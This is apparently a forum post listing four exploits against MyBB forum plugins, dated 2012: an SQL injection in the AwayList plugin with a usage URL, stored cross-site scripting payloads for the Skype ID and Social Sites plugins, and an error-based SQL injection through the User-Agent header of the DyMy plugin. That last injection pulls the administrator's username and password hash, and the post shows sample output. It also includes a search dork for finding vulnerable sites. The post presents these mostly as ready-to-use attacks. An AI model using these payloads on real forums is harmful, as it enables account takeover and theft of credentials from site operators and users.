Tweet
Grande Liste D'exploits mybb [Partie 1]
AwayList MyBB plugin SQLi 0day
Profile Skype ID MyBB Plugin Stored XSS
Social Sites MyBB Plugin 0.2.2 Cross Site Scripting
MyBB DyMy User Agent Plugin SQL injection vulnerability
Code:
# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.
Vulnerable code :
<?php
$query = $db->simple_select( // 245
"awaylist", '*', "id = '" . $mybb->input['id'] . "'" // 246
); // 247
$item = $db->fetch_array($query); // 248
?>
The variable '$mybb->input['id']' remains unsanitized.
Usage : http://server/index.php?action=editAwlItem&id=[SQLi]
Shoutout to Zixem <3 & Team Vect0r :3
Code:
# Exploit Title: Profile Skype ID MyBB Plugin Stored XSS
# Date: 14/12/2012
# Exploit Author: limb0
# Vendor Homepage: http://www.dragonknightz.net/
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Category:Web Security
# Tested on: Linux
+------------------------------------------------------------+
Stored XSS-Instructions
1.Install&Activate plugin
2.Go to UserCP >> Edit Profile >> Skype ID:
3.Inject your string(xss) ex. "><script>alert("Skype ID XSS")</script>
4.Visit your profile and voila
Proof
Inject:https://imageshack.us/photo/my-images/22/screenshotfrom201212141.png/
Result:https://imageshack.us/photo/my-images/41/screenshotfrom201212141.png/
+-------------------------------------------------------------+
Vulnerable code:
function profileskype_update($skype)
{
global $mybb;
if (isset($mybb->input['skype']))
{
$skype->user_update_data['skype'] = $mybb->input['skype'];
}
}
Code:
# Exploit Title: Social Sites MyBB Plugin 0.2.2 Cross Site Scripting # Google Dork: inurl:usercp.php?action=socialsites # Date: 13.12.2012 # Exploit Author: s3m00t # Vendor Homepage: http://mattrogowski.co.uk/mybb/ # Software Link: http://mods.mybb.com/view/social-sites # Version: 0.2.2 # Tested on: PHP Reason: Lack of input validation at several places. Proof of Concept: 1. Navigate to "usercp.php?action=socialsites" and you will see a number of fields as http://i.imgur.com/0tz98.png. 2. Submit below input into any of the field: " /><script>alert(1)</script><img src=" 3. The input will be stored as shown at http://i.imgur.com/Z8bYM.png Solution: Replace the content of "inc/plugins/socialsites.php" with this script: http://pastebin.com/5JLdg4gh
Code:
############################################################################ # Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. # # Author: JoinSe7en # # Date : 13 Dec 2012 # # Tested on : Linux # # Category : Web Applications # # Software Link : http://mods.mybb.com/view/dymy-user-agent # ############################################################################ [*] PoC (receive admin username) We fire up HTTP Live Headers or a similar tool, post something and press 'replay'. We then replace our user agent with the following Query: POST http://localhost/mybb/newreply.php?ajax=1 HTTP Headers: Host: localhost User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); # Output: SQL Error: 1062 - Duplicate entry 'admin1' for key 'group_key' +------------------------------------------------------------------+ [*] PoC (receive admin password) We then replace our user agent with the following Query: POST http://localhost/mybb/newreply.php?ajax=1 HTTP Headers: Host: localhost User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); # Output: SQL Error: 1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key' +------------------------------------------------------------------+ Enjoy.